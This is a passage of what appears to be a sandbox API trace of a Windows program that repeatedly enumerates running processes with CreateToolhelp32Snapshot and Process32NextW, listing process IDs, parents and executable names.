th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0146.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0146.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0146.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0146.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0146.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0146.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0146.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0146.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0146.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0146.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0146.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0146.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0146.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0146.550] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0146.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0146.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0146.553] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0146.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0146.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0146.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0146.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0146.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0146.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0146.626] CloseHandle (hObject=0xbc) returned 1 [0146.626] Sleep (dwMilliseconds=0x12c) [0146.945] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0146.951] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0146.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0146.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0146.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.970] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0146.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0146.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0146.978] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.025] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0147.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0147.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.049] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.052] CloseHandle (hObject=0xc4) returned 1 [0147.052] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0147.057] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.059] Process32NextW (in: 